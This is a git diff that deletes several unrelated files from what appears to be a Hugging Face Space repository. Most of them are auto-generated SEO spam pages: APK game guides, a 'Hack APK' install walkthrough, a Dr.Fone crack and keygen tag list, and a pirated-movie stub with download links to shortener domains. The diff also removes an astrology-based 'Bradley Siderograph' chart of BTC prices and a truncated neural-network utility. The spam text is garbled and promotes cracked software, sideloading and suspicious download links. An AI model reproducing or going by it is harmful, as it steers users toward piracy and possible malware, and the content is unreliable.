    Now that you have downloaded and installed Werewolf Among Us APK, you are ready to play it. Here are some basic rules and tips on how to play the game:

    -

    The roles and teams in Werewolf Among Us APK

    -

    In Werewolf Among Us APK, there are two main teams: the wolves and the villagers. The wolves are the impostors who try to kill the villagers, while the villagers are the innocent players who try to find and vote out the wolves. Each player is assigned a role at the beginning of the game, which determines their team and abilities. Some of the roles are:

    - - - - - - - - - - - -
    RoleTeamDescription
    WerewolfWolvesA basic wolf who can kill one villager at night.
    Beta WolfWolvesA wolf who can turn one villager into a wolf at night.
    Mystic WolfWolvesA wolf who can check one player's role at night.
    VillagerVillagersA basic villager who has no special abilities.
    SeerVillagersA villager who can check one player's team at night.
    DoctorVillagersA villager who can heal one player at night.
    DetectiveVillagersA villager who can check one player's action at night.
    HunterVillagersA villager who can kill one player when they die.
    JesterN/AA neutral player who wins if they get voted out by the villagers.
    CupidN/AA neutral player who can make two players fall in love at night. If one of them dies, the other dies too.
    -

    There are more roles in the game, and you can check them out in the game's settings or online.

    -

    werewolf among us game download
    -werewolf among us mod apk
    -werewolf among us online multiplayer
    -werewolf among us android app
    -werewolf among us free apk
    -werewolf among us latest version
    -werewolf among us hack apk
    -werewolf among us gameplay guide
    -werewolf among us tips and tricks
    -werewolf among us best roles
    -werewolf among us review and rating
    -werewolf among us cheats and codes
    -werewolf among us strategy and tactics
    -werewolf among us how to play
    -werewolf among us fun and funny moments
    -werewolf among us characters and skins
    -werewolf among us update and patch notes
    -werewolf among us fan art and memes
    -werewolf among us discord server and community
    -werewolf among us voice chat and communication
    -werewolf among us custom maps and modes
    -werewolf among us bugs and glitches
    -werewolf among us comparison and alternatives
    -werewolf among us secrets and easter eggs
    -werewolf among us challenges and achievements
    -werewolf among us rules and settings
    -werewolf among us download for pc
    -werewolf among us emulator for windows
    -werewolf among us apk pure and safe
    -werewolf among us no ads and premium features
    -werewolf among us offline and solo mode
    -werewolf among us space theme and background
    -werewolf among us different professions and skills
    -werewolf among us random identity and team assignment
    -werewolf among us day and night cycle and real-time gameplay
    -werewolf among us villagers, werewolves, cupid, fortune teller, defender, witch, hunter, idiot roles and identities
    -werewolf among us support and feedback
    -werewolf among us installation and requirements
    -werewolf among us trailer and screenshots
    -werewolf among us genre and category

    -

    The phases and actions in Werewolf Among Us APK

    -

    In Werewolf Among Us APK, the game is divided into two phases: the night phase and the day phase. During the night phase, the wolves and some villagers can use their abilities to kill, investigate, heal, or manipulate other players. During the day phase, all the players can discuss and vote to eliminate one player who they suspect is a wolf. The game alternates between these two phases until one team wins or the game ends in a draw.

    -

    The tips and strategies for Werewolf Among Us APK

    -

    To play Werewolf Among Us APK well, you need to have some skills and strategies that can help you win the game. Here are some tips and strategies for playing the game:

    -
      -
    • If you are a wolf, you need to lie, bluff, and deceive the villagers. You can pretend to be a villager or a special role, accuse other players of being wolves, or create alibis for yourself and your teammates.
    • -
    • If you are a villager, you need to deduce, communicate, and cooperate with other villagers. You can use logic, evidence, and intuition to find the wolves, share your information and suspicions with other players, or ask for help from special roles.
    • -
    • If you are a neutral player, you need to manipulate, confuse, and trick both teams. You can act as a third party that can sway the votes, create chaos and suspicion among the players, or use your abilities to achieve your goal.
    • -
    • In general, you need to pay attention to the clues, actions, and behaviors of other players. You can also use voice chat or text chat to communicate with other players, but be careful of what you say and who you trust.
    • -
    -

    Why play Werewolf Among Us APK?

    -

    Werewolf Among Us APK is a game that can offer you many benefits and challenges. Here are some reasons why you should play the game:

    -

    The benefits of playing Werewolf Among Us APK

    -

    Playing Werewolf Among Us APK can help you:

    -
      -
    • Improve your cognitive skills, such as memory, logic, creativity, and problem-solving.
    • -
    • Enhance your social skills, such as communication, persuasion, teamwork, and leadership.
    • -
    • Have fun with your friends or make new friends online.
    • -
    • Experience different scenarios and outcomes every time you play.
    • -
    • Satisfy your curiosity and interest in mystery and horror genres.
    • -
    -

    The challenges of playing Werewolf Among Us APK

    -

    Playing Werewolf Among Us APK can also pose some challenges for you. Some of these challenges are:

    -
      -
    • You may encounter some technical issues or bugs that affect the game quality or performance.
    • -
    • You may face some difficulties or frustrations when playing with strangers or trolls who ruin the game.
    • -
    • You may feel some stress or pressure when playing as a wolf or a special role that has a lot of responsibility.
    • -
    • You may get addicted to the game and spend too much time or money on it.
    • -
    • You may get scared or disturbed by some of the graphics or sound effects of the game.
    • -
    -

    Conclusion

    -

    Werewolf Among Us APK is a social game of deception and survival that is inspired by Among Us and Werewolf. It is a game that can test your skills of deduction, deception, and communication while having fun with other players online. It is a game that has many features, roles, modes, and settings that make it diverse and engaging. It is a game that can offer you many benefits and challenges that can improve your cognitive and social skills while satisfying your curiosity and interest. If you are looking for a game that is thrilling, challenging, and entertaining, then you should try Werewolf Among Us APK.

    -

    FAQs

    -

    Here are some frequently asked questions about Werewolf Among Us APK:

    -

    Q: Is Werewolf Among Us APK free?

    -

    A: Yes, Werewolf Among Us APK is free to download and play. However, it may contain some in-app purchases or ads that require real money.

    -

    Q: Is Werewolf Among Us APK safe?

    -

    A: Yes A: Yes, Werewolf Among Us APK is safe to use as long as you download it from a trusted source and scan it for viruses or malware. However, you should be careful of what information you share with other players or what permissions you grant to the app.

    -

    Q: How can I play Werewolf Among Us APK with my friends?

    -

    A: You can play Werewolf Among Us APK with your friends by creating a private room and inviting them to join. You can also join a public room and invite your friends to the same room. You can use voice chat or text chat to communicate with your friends during the game.

    -

    Q: What are some of the best roles in Werewolf Among Us APK?

    -

    A: The best roles in Werewolf Among Us APK depend on your preference and play style. Some of the most popular and powerful roles are:

    -
      -
    • Werewolf: A wolf who can kill one villager at night and deceive the others during the day.
    • -
    • Seer: A villager who can check one player's team at night and reveal the wolves to the others.
    • -
    • Jester: A neutral player who wins if they get voted out by the villagers and can cause chaos and confusion among the players.
    • -
    • Cupid: A neutral player who can make two players fall in love at night and influence their votes and actions.
    • -
    -

    Q: How can I win Werewolf Among Us APK?

    -

    A: To win Werewolf Among Us APK, you need to follow the objective of your role and team. If you are a wolf, you need to kill all the villagers or outnumber them. If you are a villager, you need to find and vote out all the wolves. If you are a neutral player, you need to achieve your specific goal, such as getting voted out or making your lovers survive.

    -

    Q: Where can I find more information about Werewolf Among Us APK?

    -

    A: You can find more information about Werewolf Among Us APK on the official website of the game, the online forums or communities of the game, or the online reviews or guides of the game.

    197e85843d
    -
    -
    \ No newline at end of file diff --git a/spaces/congsaPfin/Manga-OCR/logs/Worms Zone.io - Hungry Snake MOD APK Unlock All Features and Modes.md b/spaces/congsaPfin/Manga-OCR/logs/Worms Zone.io - Hungry Snake MOD APK Unlock All Features and Modes.md deleted file mode 100644 index de6f89e9b22dd386eebdc67edba9c32883674ff4..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/logs/Worms Zone.io - Hungry Snake MOD APK Unlock All Features and Modes.md +++ /dev/null @@ -1,96 +0,0 @@ - -

    Worms Zone .io - Hungry Snake Hack APK: How to Download and Play

    -

    Do you love slithering, eating, and growing in a fun and addictive snake game? If yes, then you might want to try Worms Zone .io - Hungry Snake, a popular online multiplayer game where you can compete with other players from around the world. But what if you want to get unlimited money, skins, and power-ups in the game? Well, you can do that by downloading and installing Worms Zone .io - Hungry Snake Hack APK, a modified version of the original game that gives you access to all the features and resources for free. In this article, we will tell you what Worms Zone .io - Hungry Snake is, what Worms Zone .io - Hungry Snake Hack APK is, and how to download and play it on your Android device.

    -

    What is Worms Zone .io - Hungry Snake?

    -

    Worms Zone .io - Hungry Snake is a casual arcade game developed by CASUAL AZUR GAMES. It is inspired by the classic snake game, but with a twist. In this game, you control a worm that can grow bigger and longer by eating food and other worms on the map. You can also customize your worm with different skins, outfits, and accessories. The game has various modes, such as Classic, Turbo, and Battle Royale, where you can challenge yourself and other players. The game also has leaderboards, achievements, and daily missions to keep you engaged.

    -

    worms zone io hungry snake hack apk


    Download File ✶✶✶ https://urlca.com/2uOflp



    -

    Features of Worms Zone .io - Hungry Snake

    -
      -
    • Simple and intuitive controls: You can control your worm by swiping on the screen or using a virtual joystick.
    • -
    • Colorful and vibrant graphics: The game has a bright and cheerful design that appeals to players of all ages.
    • -
    • Fun and addictive gameplay: The game is easy to play but hard to master. You have to avoid crashing into other worms or the walls while eating as much as you can.
    • -
    • Various modes and maps: The game has different modes and maps to suit your preferences and skills. You can play in Classic mode, where you have to survive as long as possible; Turbo mode, where you have to move faster and eat more; or Battle Royale mode, where you have to be the last worm standing.
    • -
    • Customization options: You can personalize your worm with hundreds of skins, outfits, and accessories. You can also unlock new items by completing missions or using coins.
    • -
    • Social features: You can play with your friends or other players from around the world. You can also chat with them, send emojis, and join clans.
    • -
    -

    How to play Worms Zone .io - Hungry Snake

    -
      -
    1. Download and install the game from Google Play Store or App Store.
    2. -
    3. Launch the game and choose your mode and map.
    4. -
    5. Select your worm skin and outfit.
    6. -
    7. Swipe on the screen or use the joystick to move your worm.
    8. -
    9. Eat food and other worms to grow bigger and longer.
    10. -
    11. Avoid crashing into other worms or the walls.
    12. -
    13. Use power-ups to boost your speed, size, or vision.
    14. -
    15. Try to be the biggest worm on the map or the last worm alive.
    16. -
    -

    What is Worms Zone .io - Hungry Snake Hack APK?

    -

    Worms Zone .io - Hungry Snake Hack APK is a modified version of the original game that allows you to get unlimited money, skins, and power-ups for free. It is not an official app, but a third-party app that has been hacked by some developers. By using this app, you can enjoy all the features and resources of the game without spending any money or watching any ads. You can also unlock all the items and modes in the game without completing any missions or achievements.

    -

    Benefits of Worms Zone .io - Hungry Snake Hack APK

    -
      -
    • Free and unlimited money: You can get as much money as you want in the game, which you can use to buy skins, outfits, and accessories for your worm.
    • -
    • Free and unlimited power-ups: You can get as many power-ups as you want in the game, which you can use to boost your speed, size, or vision.
    • -
    • Free and unlimited skins: You can get access to all the skins in the game, which you can use to customize your worm.
    • -
    • Free and unlimited modes and maps: You can get access to all the modes and maps in the game, which you can use to play in different scenarios and challenges.
    • -
    • No ads: You can play the game without any interruptions or distractions from ads.
    • -
    -

    Risks of Worms Zone .io - Hungry Snake Hack APK

    -
      -
    • Illegal and unsafe: The app is not authorized by the original developers of the game, and it may contain viruses or malware that can harm your device or steal your data.
    • -
    • Banned and blocked: The app may be detected by the game servers and you may be banned or blocked from playing the game online.
    • -
    • Unfair and unethical: The app may give you an unfair advantage over other players who are playing the game legitimately, and it may ruin the fun and balance of the game.
    • -
    -

    How to download and install Worms Zone .io - Hungry Snake Hack APK?

    -

    If you still want to try Worms Zone .io - Hungry Snake Hack APK, you need to follow these steps:

    -

    Step 1: Enable unknown sources

    -

    You need to enable unknown sources on your device to allow the installation of apps from outside the Google Play Store. To do this, go to Settings > Security > Unknown sources and toggle it on.

    -

    Step 2: Download the APK file

    -

    You need to download the APK file of Worms Zone .io - Hungry Snake Hack APK from a reliable source. You can search for it on Google or use this link. Make sure you scan the file for viruses before downloading it.

    -

    Step 3: Install the APK file

    -

    You need to install the APK file on your device. To do this, locate the file in your downloads folder and tap on it. Follow the instructions on the screen to complete the installation.

    -

    Step 4: Launch the game and enjoy

    -

    You need to launch the game and enjoy all the features and resources for free. To do this, open the app icon on your home screen or app drawer. You may need to allow some permissions for the app to run properly.

    -

    worms zone io hungry snake mod apk unlimited money
    -worms zone io hungry snake cheat apk download
    -worms zone io hungry snake hack apk latest version
    -worms zone io hungry snake mod apk android 1
    -worms zone io hungry snake hack apk no root
    -worms zone io hungry snake cheat apk free
    -worms zone io hungry snake mod apk revdl
    -worms zone io hungry snake hack apk online
    -worms zone io hungry snake cheat apk 2023
    -worms zone io hungry snake mod apk rexdl
    -worms zone io hungry snake hack apk ios
    -worms zone io hungry snake cheat apk modded
    -worms zone io hungry snake mod apk happymod
    -worms zone io hungry snake hack apk offline
    -worms zone io hungry snake cheat apk unlimited coins
    -worms zone io hungry snake mod apk pure
    -worms zone io hungry snake hack apk 4.5.3
    -worms zone io hungry snake cheat apk for pc
    -worms zone io hungry snake mod apk vip
    -worms zone io hungry snake hack apk 4.5.2
    -worms zone io hungry snake cheat apk no ads
    -worms zone io hungry snake mod apk 4.5.4
    -worms zone io hungry snake hack apk for android
    -worms zone io hungry snake cheat apk unlocked
    -worms zone io hungry snake mod apk 4.5.5

    -

    Conclusion

    -

    Worms Zone .io - Hungry Snake is a fun and addictive snake game that you can play online with other players. However, if you want to get unlimited money, skins, and power-ups in the game, you can download and install Worms Zone .io - Hungry Snake Hack APK, a modified version of the original game that gives you access to all the features and resources for free. However, you should be aware of the risks involved in using this app, such as being illegal, unsafe, banned, blocked, unfair, and unethical. Therefore, we do not recommend using this app, and we advise you to play the game legitimately and responsibly.

    -

    FAQs

    -
      -
    • Q: Is Worms Zone .io - Hungry Snake Hack APK safe?
    • -
    • A: No, it is not safe. It may contain viruses or malware that can harm your device or steal your data. It may also be detected by the game servers and you may be banned or blocked from playing the game online.
    • -
    • Q: Is Worms Zone .io - Hungry Snake Hack APK legal?
    • -
    • A: No, it is not legal. It is not authorized by the original developers of the game, and it violates their terms of service and intellectual property rights.
    • -
    • < - Q: How can I get more coins in Worms Zone .io - Hungry Snake?
    • -
    • A: You can get more coins in the game by eating food and other worms, completing missions and achievements, watching ads, or buying them with real money.
    • -
    • Q: How can I change my worm skin and outfit in Worms Zone .io - Hungry Snake?
    • -
    • A: You can change your worm skin and outfit in the game by tapping on the hanger icon on the main menu. You can choose from hundreds of skins, outfits, and accessories that you have unlocked or bought with coins.
    • -
    • Q: How can I play with my friends in Worms Zone .io - Hungry Snake?
    • -
    • A: You can play with your friends in the game by tapping on the friends icon on the main menu. You can invite your friends to join your clan or join their clan. You can also chat with them, send emojis, and see their stats.
    • -
    • Q: What are the best power-ups in Worms Zone .io - Hungry Snake?
    • -
    • A: The best power-ups in the game are the magnet, which attracts food and coins to you; the shield, which protects you from crashing into other worms or the walls; and the lightning, which increases your speed and size.
    • -

    197e85843d
    -
    -
    \ No newline at end of file diff --git a/spaces/contluForse/HuggingGPT/assets/Download Merry Christmas English Dubbed Torrent for Free A Guide to the Best Sources.md b/spaces/contluForse/HuggingGPT/assets/Download Merry Christmas English Dubbed Torrent for Free A Guide to the Best Sources.md deleted file mode 100644 index 0b290f8ca744a9ed63afce43eae8619c36cbb728..0000000000000000000000000000000000000000 --- a/spaces/contluForse/HuggingGPT/assets/Download Merry Christmas English Dubbed Torrent for Free A Guide to the Best Sources.md +++ /dev/null @@ -1,5 +0,0 @@ -
    -

    Posted in Data Recovery, Software. Tagged as dr fone 10.5.1 Crack, dr fone 10.7.2 Crack, dr fone 11 Crack, dr fone 11.0.7 Crack, dr fone 11.0.9 Crack mac, dr fone 11.3 crack, dr fone 11.4 Crack, dr fone 12.1 Crack, Dr Fone 12.2 Crack, dr fone 2022 Crack, dr fone 2023 crack, dr fone crack 2021, dr fone Crack 2022 Download, Dr.Fone iOS Crack, DR.Fone Keygen, Dr.Fone Mac Crack, DR.Fone Registration Code, wondershare dr fone crack ios, wondershare dr fone crack mac, wondershare dr fone torrent, wondershare dr.fone, wondershare dr.fone crack

    -

    Wondershare Dr.Fone for Android keygen


    Download Zip 🗸🗸🗸 https://ssurll.com/2uzvST



    aaccfb2cb3
    -
    -
    \ No newline at end of file diff --git a/spaces/contluForse/HuggingGPT/assets/Eaten Alive 1980 Full Movie in Hindi Download The Most Shocking and Scary Scenes from the Film.md b/spaces/contluForse/HuggingGPT/assets/Eaten Alive 1980 Full Movie in Hindi Download The Most Shocking and Scary Scenes from the Film.md deleted file mode 100644 index d94a51690355202f36b01fd1a30581ce9f8c54bf..0000000000000000000000000000000000000000 --- a/spaces/contluForse/HuggingGPT/assets/Eaten Alive 1980 Full Movie in Hindi Download The Most Shocking and Scary Scenes from the Film.md +++ /dev/null @@ -1,6 +0,0 @@ -

    eatenalive1980fullmovieinhindidownload


    Download Zip ★★★ https://ssurll.com/2uzyhM



    - - aaccfb2cb3
    -
    -
    -

    diff --git a/spaces/coolprakashjj/Bradley-Siderograph-Public/app.py b/spaces/coolprakashjj/Bradley-Siderograph-Public/app.py deleted file mode 100644 index 9fd4ee441e759d415405081fb6979c9a60f5351f..0000000000000000000000000000000000000000 --- a/spaces/coolprakashjj/Bradley-Siderograph-Public/app.py +++ /dev/null @@ -1,291 +0,0 @@ -import os -os.environ['SE_EPHE_PATH'] = 'ephe' - -import gradio as gr - -# !pip install --user pyswisseph - -import swisseph as swe -import datetime -from typing import Dict, List, Tuple, Callable, Optional -import numpy as np -import matplotlib.pyplot as plt -import pandas as pd -from itertools import combinations -from functools import reduce -import re - -def BradleySiderograph(start_date, end_date, center='geo', center_planet='EARTH', data_file='BTCUSD.csv'): - - # ---------------------------------------------------------------------------------------------------------------------------------------------------------------- - - def calculate_julian_day(date: datetime.date) -> float: - return swe.julday(date.year, date.month, date.day) - - def generate_dates(start_date: datetime.date, end_date: datetime.date) -> List[datetime.date]: - delta = end_date - start_date - return list(map(lambda i: start_date + datetime.timedelta(days=i), range(delta.days + 1))) - - def calculate_julian_days(start_date: datetime.date, end_date: datetime.date) -> Dict[datetime.date, float]: - date_range = generate_dates(start_date, end_date) - julian_days = dict(zip(date_range, map(calculate_julian_day, date_range))) - return julian_days - - start_date = datetime.datetime.strptime(start_date, '%Y-%m-%d').date() - end_date = datetime.datetime.strptime(end_date, '%Y-%m-%d').date() - - julian_days = calculate_julian_days(start_date, end_date) - - # ---------------------------------------------------------------------------------------------------------------------------------------------------------------- - data = pd.read_csv(data_file.name,parse_dates = True,index_col=0) - data = data.loc[start_date:end_date] - data = data.resample('D').mean().interpolate(method='linear', limit_direction='both') - data = np.log(data) -# ---------------------------------------------------------------------------------------------------------------------------------------------------------------- - if center == 'planeto': - if center_planet.upper() == 'MERCURY': - center_planet = swe.MERCURY - elif center_planet.upper() == 'VENUS': - center_planet = swe.VENUS - elif center_planet.upper() == 'EARTH': - center_planet = swe.EARTH - elif center_planet.upper() == 'MOON': - center_planet = swe.MOON - elif center_planet.upper() == 'MARS': - center_planet = swe.MARS - elif center_planet.upper() == 'JUPITER': - center_planet = swe.JUPITER - elif center_planet.upper() == 'SATURN': - center_planet = swe.SATURN - elif center_planet.upper() == 'URANUS': - center_planet = swe.URANUS - elif center_planet.upper() == 'NEPTUNE': - center_planet = swe.NEPTUNE - elif center_planet.upper() == 'PLUTO': - center_planet = swe.PLUTO - else: - raise ValueError("Invalid center_planet. Accepted values are 'MERCURY', 'VENUS', 'EARTH', 'MOON', 'MARS', 'JUPITER', 'SATURN', 'URANUS', 'NEPTUNE', or 'PLUTO'.") - - - mid_term_combinations = [ ('Mercury', 'Pluto'), ('Mercury', 'Neptune'), ('Mercury', 'Uranus'), ('Mercury', 'Saturn'), ('Mercury', 'Jupiter'), ('Mercury', 'Mars'), ('Mercury', 'Sun'), ('Mercury', 'Venus'), ('Venus', 'Pluto'), ('Venus', 'Neptune'), ('Venus', 'Uranus'), ('Venus', 'Saturn'), ('Venus', 'Jupiter'), ('Venus', 'Mars'), ('Sun', 'Pluto'), ('Sun', 'Neptune'), ('Sun', 'Uranus'), ('Sun', 'Saturn'), ('Sun', 'Jupiter'), ('Sun', 'Venus'), ('Mars', 'Pluto'), ('Mars', 'Neptune'), ('Mars', 'Uranus'), ('Mars', 'Saturn'), ('Mars', 'Sun'), ('Mars', 'Jupiter')] - long_term_combinations = [ ('Jupiter', 'Pluto'), ('Jupiter', 'Neptune'), ('Jupiter', 'Uranus'), ('Jupiter', 'Saturn'), ('Saturn', 'Pluto'), ('Saturn', 'Neptune'), ('Saturn', 'Uranus'), ('Uranus', 'Pluto'), ('Uranus', 'Neptune'), ('Neptune', 'Pluto'),] - - valency_data = [ - [ 1, 1, 1, 1, -1, 1, -1, -1, 1, -1], - [ 1, 1, 1, 1, -1, 1, -1, 1, -1, -1], - [ 1, 1, 1, 1, -1, 1, -1, 1, 1, -1], - [ 1, 1, 1, 1, -1, 1, -1, 1, 1, 1], - [-1, -1, -1, -1, 1, -1, -1, -1, -1, -1], - [ 1, 1, 1, 1, -1, 1, -1, -1, 1, -1], - [-1, -1, -1, -1, -1, -1, 1, -1, -1, -1], - [-1, 1, 1, 1, -1, -1, -1, 1, -1, -1], - [ 1, -1, 1, 1, -1, 1, -1, -1, 1, -1], - [-1, -1, -1, 1, -1, -1, -1, -1, -1, 1], - ] - - valency = pd.DataFrame(valency_data, index=[ "moon", "sun", "mercury", "venus", "mars", "jupiter", "saturn", "uranus", "neptune", "pluto"], columns=['moon', 'sun', 'mercury', 'venus', 'mars', 'jupiter', 'saturn', 'uranus', 'neptune', 'pluto']) - - planets = [swe.SUN, swe.MOON, swe.MERCURY, swe.VENUS, swe.MARS, swe.JUPITER, swe.SATURN, swe.URANUS, swe.NEPTUNE, swe.PLUTO] - - # ---------------------------------------------------------------------------------------------------------------------------------------------------------------- - def calculate_planetary_longitudes(julian_day: float, mode: str = 'geo') -> Dict[str, float]: - def get_longitude(planet: int) -> Dict[str, float]: - if mode == 'geo': - position, ret_code = swe.calc_ut(julian_day, planet, flags=swe.FLG_SWIEPH|swe.FLG_SIDEREAL) - elif mode == 'helio': - position, ret_code = swe.calc_ut(julian_day, planet, flags=swe.FLG_SWIEPH|swe.FLG_SIDEREAL|swe.FLG_HELCTR) - elif mode == 'planeto': - if planet != center_planet: - position, ret_code = swe.calc_pctr(julian_day, planet, center=center_planet, flags=swe.FLG_SWIEPH|swe.FLG_SIDEREAL) - else: - return {} # Return an empty dictionary if the planet and center are the same - else: - raise ValueError("Invalid mode. Accepted values are 'geo', 'helio', or 'planeto'.") - - return {swe.get_planet_name(planet) + "_Longitude": position[0]} - - longitudes = {k: v for d in map(get_longitude, planets) for k, v in d.items()} - - return longitudes - - def calculate_all_longitudes(julian_days: Dict[datetime.date, float], mode: str = 'geo') -> Dict[datetime.date, Dict[str, float]]: - return dict(map(lambda date_jd: (date_jd[0], calculate_planetary_longitudes(date_jd[1], mode)), julian_days.items())) - - # Calculate the geo longitudes for all planets for each day - planetary_longitudes = calculate_all_longitudes(julian_days, mode=center) - - # Convert to DataFrame format - df_planetary_longitudes = pd.DataFrame.from_dict(planetary_longitudes, orient='index') - df_planetary_longitudes.index.name = 'timestamp' - df_planetary_longitudes.reset_index(inplace=True) - df_planetary_longitudes.set_index('timestamp', inplace=True) - - # ---------------------------------------------------------------------------------------------------------------------------------------------------------------- - def calculate_planetary_declinations(julian_day: float, mode: str = 'geo') -> Dict[str, float]: - planets = [swe.VENUS, swe.MARS] - - def get_declination(planet: int) -> Tuple[str, float]: - if mode == 'geo': - position, ret_code = swe.calc_ut(julian_day, planet, flags=swe.FLG_SWIEPH|swe.FLG_EQUATORIAL|swe.FLG_SIDEREAL) - elif mode == 'helio': - position, ret_code = swe.calc_ut(julian_day, planet, flags=swe.FLG_SWIEPH|swe.FLG_EQUATORIAL|swe.FLG_SIDEREAL|swe.FLG_HELCTR) - elif mode == 'planeto': - if planet != center_planet: - position, ret_code = swe.calc_pctr(julian_day, planet, center=center_planet, flags=swe.FLG_SWIEPH|swe.FLG_EQUATORIAL|swe.FLG_SIDEREAL) - # print(position) - else: - return {} # Return an empty dictionary if the planet and center are the same - else: - raise ValueError("Invalid mode. Accepted values are 'geo', 'helio', or 'planeto'.") - - return {swe.get_planet_name(planet) + "_Declination": position[1]} - - declinations = {k: v for d in map(get_declination, planets) for k, v in d.items()} - - return declinations - - def calculate_all_declinations(julian_days: Dict[datetime.date, float], mode: str = 'geo') -> Dict[datetime.date, Dict[str, float]]: - return dict(map(lambda date_jd: (date_jd[0], calculate_planetary_declinations(date_jd[1], mode)), julian_days.items())) - - # Calculate the geo declinations for all planets for each day - planetary_declinations = calculate_all_declinations(julian_days, mode=center) - - # Convert to DataFrame format - df_planetary_declinations = pd.DataFrame.from_dict(planetary_declinations, orient='index') - df_planetary_declinations.index.name = 'timestamp' - df_planetary_declinations.reset_index(inplace=True) - df_planetary_declinations.set_index('timestamp', inplace=True) - # ---------------------------------------------------------------------------------------------------------------------------------------------------------------- - def create_aspect(aspect: int, planetary_longitudes: pd.DataFrame, valency: pd.DataFrame) -> pd.DataFrame: - def calc_amplitude(delta_longitude: float, planet1: str, planet2: str) -> float: - delta = np.abs(delta_longitude - aspect) - if delta <= 15: - amplitude = 10 - delta - if aspect == 0: - amplitude *= valency.at[planet1.lower(), planet2.lower()] - else: - amplitude = 0 - return amplitude - - planet_combinations = list(combinations(planetary_longitudes.columns, 2)) - - aspect_data = [pd.DataFrame({ - f"{pair[0].split('_')[0]}_{pair[1].split('_')[0]}_{aspect}": - np.abs(planetary_longitudes[pair[0]] - planetary_longitudes[pair[1]]).apply( - calc_amplitude, args=(pair[0].split('_')[0], pair[1].split('_')[0]))}) - for pair in planet_combinations] - - return pd.concat(aspect_data, axis=1) - - # Calculate aspects for each aspect angle (0, 60, 90, 120, and 180 degrees) - aspects = [0, 60, 90, 120, 180] - df_aspects = [create_aspect(aspect, df_planetary_longitudes, valency) for aspect in aspects] - - # Combine all aspect DataFrames - df_all_aspects = pd.concat(df_aspects, axis=1) - - - # ---------------------------------------------------------------------------------------------------------------------------------------------------------------- - def calculate_influence_vectorized(df_all_aspects: pd.DataFrame, combinations: List[Tuple[str, str]]) -> pd.Series: - def get_matching_columns(combo: Tuple[str, str]) -> pd.Index: - pattern = re.compile(f"{combo[0]}_{combo[1]}_\\d+") # pattern to match any aspect involving the planets in the current combination - matching_cols = df_all_aspects.columns[df_all_aspects.columns.str.match(pattern)] - return matching_cols - - def add_influence(acc: pd.Series, matching_cols: pd.Index) -> pd.Series: - return acc.add(df_all_aspects.loc[:, matching_cols].sum(axis=1), fill_value=0) - - matching_columns = map(get_matching_columns, combinations) - influence_values = reduce(add_influence, matching_columns, pd.Series(index=df_all_aspects.index, dtype=float).fillna(0)) - - return influence_values - - # ---------------------------------------------------------------------------------------------------------------------------------------------------------------- - def calculate_p(df_all_aspects: pd.DataFrame, mid_term_combinations: List[Tuple[str, str]], long_term_combinations: List[Tuple[str, str]], planetary_declinations: pd.DataFrame) -> np.ndarray: - # Calculate M - M = calculate_influence_vectorized(df_all_aspects, mid_term_combinations) - - # Calculate L - L = calculate_influence_vectorized(df_all_aspects, long_term_combinations) - - # Calculate D - D = planetary_declinations.sum(axis=1) - - # Calculate X - X = 4 - - # Calculate P - P = M.add((L.add(D)).multiply(X)) - - return P - - # ---------------------------------------------------------------------------------------------------------------------------------------------------------------- - - P = calculate_p(df_all_aspects, mid_term_combinations, long_term_combinations, df_planetary_declinations) - - # ---------------------------------------------------------------------------------------------------------------------------------------------------------------- - - fig, ax1 = plt.subplots(figsize=(20,10), sharex=True) - ax2 = ax1.twinx() - - ax1.plot(P, linewidth=2, color="black", label="Potency") - ax1.set_ylabel('Potency', color='black') - - ax2.plot(data.iloc[:, 0], linewidth=2, color="red", label="Y") - ax2.set_ylabel('Y', color='red') - - # Create a custom formatter to display the original values on the y-axis labels - def tick_formatter(val, pos): - return '{:.0f}'.format(np.exp(val)) - - # Set the custom formatter as the y-axis tick formatter for ax2 - ax2.yaxis.set_major_formatter(plt.FuncFormatter(tick_formatter)) - - # Set a title for the entire figure - title = 'Bradley Siderograph' - fig.suptitle(title, fontsize=20, fontweight="bold") - - # Set a grid on all three axes - grid_style = {'linewidth': 0.5, 'color': 'gray', 'linestyle': '--'} - ax1.grid(True, **grid_style) - ax2.grid(True, **grid_style) - - # Add a legend for all three axes - lines, labels = ax1.get_legend_handles_labels() - lines2, labels2 = ax2.get_legend_handles_labels() - - lines += lines2 - labels += labels2 - - fig.legend(lines, labels, loc='upper right') - - - - - plot_path = "bradley_siderograph.png" - plt.savefig(plot_path) - plt.close() - return plot_path - # ---------------------------------------------------------------------------------------------------------------------------------------------------------------- - -input_data = [ - gr.Textbox(value='2023-01-01', placeholder='2023-01-01'), - gr.Textbox(value='2024-01-01', placeholder='2024-01-01'), - gr.Radio(['geo', 'helio', 'planeto']), - gr.Radio(['MERCURY', 'VENUS', 'EARTH', 'MOON', 'MARS', 'JUPITER', 'SATURN', 'URANUS', 'NEPTUNE', 'PLUTO']), - gr.File(label="Upload CSV file"), -] - - -iface = gr.Interface( - fn=BradleySiderograph, - inputs=input_data, - outputs="image", - examples=[ - ["2023-01-01", "2023-12-31", "geo", "EARTH", "BTCUSD.csv"], - ["2023-01-01", "2023-12-31", "planeto", "VENUS", "BTCUSD.csv",], - ], - live=True -) - -iface.launch() diff --git a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/mmpkg/mmcv/cnn/utils/fuse_conv_bn.py b/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/mmpkg/mmcv/cnn/utils/fuse_conv_bn.py deleted file mode 100644 index cb7076f80bf37f7931185bf0293ffcc1ce19c8ef..0000000000000000000000000000000000000000 --- a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/mmpkg/mmcv/cnn/utils/fuse_conv_bn.py +++ /dev/null @@ -1,59 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -import torch -import torch.nn as nn - - -def _fuse_conv_bn(conv, bn): - """Fuse conv and bn into one module. - - Args: - conv (nn.Module): Conv to be fused. - bn (nn.Module): BN to be fused. - - Returns: - nn.Module: Fused module. - """ - conv_w = conv.weight - conv_b = conv.bias if conv.bias is not None else torch.zeros_like( - bn.running_mean) - - factor = bn.weight / torch.sqrt(bn.running_var + bn.eps) - conv.weight = nn.Parameter(conv_w * - factor.reshape([conv.out_channels, 1, 1, 1])) - conv.bias = nn.Parameter((conv_b - bn.running_mean) * factor + bn.bias) - return conv - - -def fuse_conv_bn(module): - """Recursively fuse conv and bn in a module. - - During inference, the functionary of batch norm layers is turned off - but only the mean and var alone channels are used, which exposes the - chance to fuse it with the preceding conv layers to save computations and - simplify network structures. - - Args: - module (nn.Module): Module to be fused. - - Returns: - nn.Module: Fused module. - """ - last_conv = None - last_conv_name = None - - for 